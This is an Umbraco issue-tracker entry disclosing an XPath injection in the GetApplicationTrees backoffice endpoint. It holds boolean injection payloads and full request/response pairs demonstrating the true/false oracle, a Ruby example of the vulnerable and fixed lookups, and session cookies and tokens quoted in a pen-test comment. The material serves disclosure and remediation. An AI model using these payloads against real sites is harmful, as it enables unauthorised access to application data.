U4-9237 - XPath Injection affects GetApplicationTrees

Created by Daniel Wood 01 Dec 2016, 21:31:40 Updated by Sebastiaan Janssen 26 Aug 2018, 16:07:16

Tags: PR

Umbraco version 7.3.4 assembly: 1.0.5820.25371

XPath Injection affects GetApplicationTrees

XPath injection vulnerabilities arise when user-controllable data is incorporated into XPath queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.

Depending on the purpose for which the vulnerable query is being used, an attacker may be able to exploit an XPath injection flaw to read sensitive application data or interfere with application logic. The payloads 25179032' or '* and 25179032' or '5191'='5192 were each appended to the value content in the application parameter. The two requests produced different responses: the first, whose injected predicate is always true (a non-empty string such as '*' is true in XPath), returned a node named "Concierge" (Content-Length 371), while the second, whose injected predicate is always false, echoed the raw parameter value back as the node name in square brackets (Content-Length 396). The response is therefore controlled by the truth value of the injected expression rather than by a literal match on the alias, which indicates that the input is being incorporated into an XPath query in an unsafe way.

Affected Host(s):
https://example.com:8010/umbraco/backoffice/UmbracoTrees/ApplicationTree/GetApplicationTrees

Request 1

GET /umbraco/backoffice/UmbracoTrees/ApplicationTree/GetApplicationTrees?application=content25179032'%20or%20'*&tree=&isDialog=false HTTP/1.1
Host: example.com:8010
Connection: Keep-Alive
Accept: application/json, text/plain, */*
X-XSRF-TOKEN: 1kfn1y5vXf4Twf3oTmlSQ_A-qVAD_w85-sVxBHxg0_XvhylNK-lijsykeUkS8EetiFxljFYUj1WoQckn-uJLBRJgxoxe89eKVlWXrN09k7SNQuQOfd92hp7s2BvZuYouze6_XuVaCq0SE-0g6lBXVw2
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.75 Safari/537.36
Referer: https://example.com:8010/umbraco/
…[SNIP]…

Response 1

…[SNIP]…
Date: Mon, 02 May 2016 19:55:19 GMT
Content-Length: 371
Age: 0
Via: HTTPS/1.1 localhost.localdomain

)]}', {"isContainer":true,"children":[],"parentId":null,"hasChildren":false,"nodeType":null,"routePath":null,"childNodesUrl":,"menuUrl":,"iconIsClass":true,"iconFilePath":"","cssClasses":[],"name":"Concierge","id":"-1","icon":"icon-folder-close","trashed":false,"key":"00000000-0000-0000-0000-000000000000","alias":null,"path":null,"metaData":{"containsTrees":false}}

Request 2

GET /umbraco/backoffice/UmbracoTrees/ApplicationTree/GetApplicationTrees?application=content25179032'%20or%20'5191'%3d'5192&tree=&isDialog=false HTTP/1.1
Host: example.com:8010
Connection: Keep-Alive
Accept: application/json, text/plain, */*
…[SNIP]…

Response 2

…[SNIP]…
Date: Mon, 02 May 2016 19:55:09 GMT
Content-Length: 396
Age: 0
Via: HTTPS/1.1 localhost.localdomain

)]}', {"isContainer":true,"children":[],"parentId":null,"hasChildren":false,"nodeType":null,"routePath":null,"childNodesUrl":,"menuUrl":,"iconIsClass":true,"iconFilePath":"","cssClasses":[],"name":"[content25179032' or '5191'='5192]","id":"-1","icon":"icon-folder-close","trashed":false,"key":"00000000-0000-0000-0000-000000000000","alias":null,"path":null,"metaData":{"containsTrees":false}}

Comments

Ben Palmer 26 Oct 2017, 08:59:07

Hi,

We've just had a PEN test on a site that has raised the same issue (details below). As a potential security issue it feels like this one should be higher up the list (our testers raised this as a high risk issue).


The web application was vulnerable to XPath injection. In XPath injection, an attacker sends XML data to an application or website, and this data is incorporated into XPath queries without being validated. The result is that an experienced attacker could gain access to sensitive data, alter the application's behaviour, and possibly gain elevated privileges. In order to exploit this issue, the payload was injected into the application parameter of the following request:

GET /umbraco/backoffice/UmbracoTrees/ApplicationTree/GetApplicationTrees?isDialog=false&application=media12323458'+or '1'='1&tree= HTTP/1.1
Accept-Encoding: gzip, deflate
Host: HOST
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0
Cookie: ARRAffinity=b3a27f2aa0a6da0b21f2bc98dcf67247321588d733728583022eac19e92176d4; _ga=GA1.3.730234357.1508835368; _gid=GA1.3.1614089538.1508835368; _bizo_bzid=943cae93-777a-418a-8863-5bc8a798ff5b; _bizo_cksm=20BCF1606209B74F; _bizo_np_stats=155%3D2008%2C; XSRF-TOKEN=I9939iv_TE7M_2DMXe9DDYhEflRXegRs8rDbKD4uMvE8tRyQEhKAxP3xP0QC8Nsl5zyX1aZN13zZVxjEPJLruch0vkB8j11mmpxQrfYQaNt5gnfZ41_RoPlGviLe0vY-ttyCCom3tO8-ejS6S2Wd7Q2; XSRF-V=_RG7WLZhdMZRchoyoTyfJsfDb8u_ipubwCJv-RkDi4ZwVb91K8ueVft_kWIuxoVQBtYsbqCY1d-Uew_jzlu1Lu6Y9Cj2xcszJgbgG-n…[SNIP]…essionId=l4quobc3actvsfdy2qduhey1; __RequestVerificationToken=aFvf2pkMVkzwyZKKCFl5gj6saGVp59rZZ-eAaQ8sUQhFhJwEFC2AkLH6v9erFUtnOzXoArOI75aEDNkO9lUMe9nHDThcvklt0v-U3l0EvwM1
Connection: close
User-Agent: Recon-ng/v4

The (JSON) body response would be evaluated and return:

)]}', {isContainer:true,children:[],parentId:null,hasChildren:false,nodeType:null,routePath:null,childNodesUrl:,menuUrl:,iconIsClass:true,iconFilePath:,cssClasses:[],name:Concierge,id:-1,udi:null,icon:icon-folder-close,trashed:false,key:00000000-0000-0000-0000-000000000000,alias:null,path:null,metaData:{containsTrees:false}}

However, when injecting a false statement into the application parameter:

GET /umbraco/backoffice/UmbracoTrees/ApplicationTree/GetApplicationTrees?isDialog=false&application=media12323458'+or '1'='2&tree=

The body response would be:

)]}', {isContainer:true,children:[],parentId:null,hasChildren:false,nodeType:null,routePath:null,childNodesUrl:,menuUrl:,iconIsClass:true,iconFilePath:,cssClasses:[],name:[media12323458' or '1'='2],id:-1,udi:null,icon:icon-folder-close,trashed:false,key:00000000-0000-0000-0000-000000000000,alias:null,path:null,metaData:{containsTrees:false}}
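The true/false oracle described in the issue and in the pen-test finding above, reproduced as an added example that is not Umbraco's code and not the change in the linked PR. It assumes the vulnerable pattern is a string-built XPath lookup of a localized name keyed by the application alias, with a "[alias]" fallback when nothing matches; that shape is an assumption modeled on the bracketed echo in the responses. The language document is constructed for the example, and Ruby's REXML stands in for the .NET XPath API so the example runs stand-alone. The hardened version binds the alias as an XPath variable instead of splicing it into the query text, and an identifier allowlist rejects such input before it reaches any query at all.

```ruby
# Added example (not Umbraco's code): a string-built XPath lookup of a
# localized section name beside a parameterized one, driven with the two
# payloads from the pen-test comment. The language document below is
# constructed for the example; the lookup shape (area alias -> key alias ->
# text) is an assumption modeled on the bracketed "[alias]" echo in the
# responses shown in the issue.
require "rexml/document"

LANG_XML = <<~XML
  <language>
    <area alias="sections">
      <key alias="content">Content</key>
      <key alias="media">Media</key>
      <key alias="settings">Settings</key>
    </area>
  </language>
XML

LANG_DOC = REXML::Document.new(LANG_XML)

# Vulnerable: the caller-controlled key is spliced into the XPath text, so a
# single quote in the input closes the literal and the rest becomes query
# structure. Unmatched lookups fall back to "[key]", which is what makes a
# true predicate and a false predicate distinguishable from the outside.
def text_vulnerable(area, key)
  xpath = "//area[@alias='#{area}']/key[@alias='#{key}']"
  node = REXML::XPath.first(LANG_DOC, xpath)
  node ? node.text : "[#{key}]"
end

# Hardened: area and key are bound as XPath variables ($area, $key), so they
# are compared as plain string values and cannot change the query structure.
def text_safe(area, key)
  xpath = "//area[@alias=$area]/key[@alias=$key]"
  node = REXML::XPath.first(LANG_DOC, xpath, {}, { "area" => area, "key" => key })
  node ? node.text : "[#{key}]"
end

# Defense in depth: an application alias is an identifier, so anything else
# (quotes, spaces, operators) is rejected before any lookup is attempted.
ALIAS_RE = /\A[A-Za-z0-9_-]+\z/
def valid_alias?(alias_name)
  ALIAS_RE.match?(alias_name)
end

# The two payloads from the pen-test comment: an always-true predicate and an
# always-false one appended to a non-existent alias.
TRUE_PAYLOAD  = "media12323458' or '1'='1"
FALSE_PAYLOAD = "media12323458' or '1'='2"

if __FILE__ == $PROGRAM_NAME
  # Vulnerable: true predicate matches the first key in the area, false
  # predicate falls through to the bracketed echo -> the responses differ.
  puts text_vulnerable("sections", TRUE_PAYLOAD)   # Content
  puts text_vulnerable("sections", FALSE_PAYLOAD)  # [media12323458' or '1'='2]
  # Hardened: both payloads are just unknown aliases -> identical behaviour.
  puts text_safe("sections", TRUE_PAYLOAD)         # [media12323458' or '1'='1]
  puts text_safe("sections", FALSE_PAYLOAD)        # [media12323458' or '1'='2]
  puts valid_alias?("media")                       # true
  puts valid_alias?(TRUE_PAYLOAD)                  # false
end
```

The point of the pair is that the vulnerable lookup leaks one bit per request (did the injected predicate evaluate true?), which is exactly the differential the testers observed; once the value is bound as a variable, both payloads become ordinary unknown aliases and the oracle disappears. The allowlist is the check to apply at the controller boundary regardless of how the query is built.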


Shannon Deminick 18 Dec 2017, 04:06:11

PR: https://github.com/umbraco/Umbraco-CMS/pull/2315


Priority: Normal

Type: Bug

State: Fixed

Assignee:

Difficulty: Normal

Category: Security

Backwards Compatible: True

Fix Submitted:

Affected versions: 7.3.4

Due in version: 7.13.0

Sprint:

Story Points:

Cycle: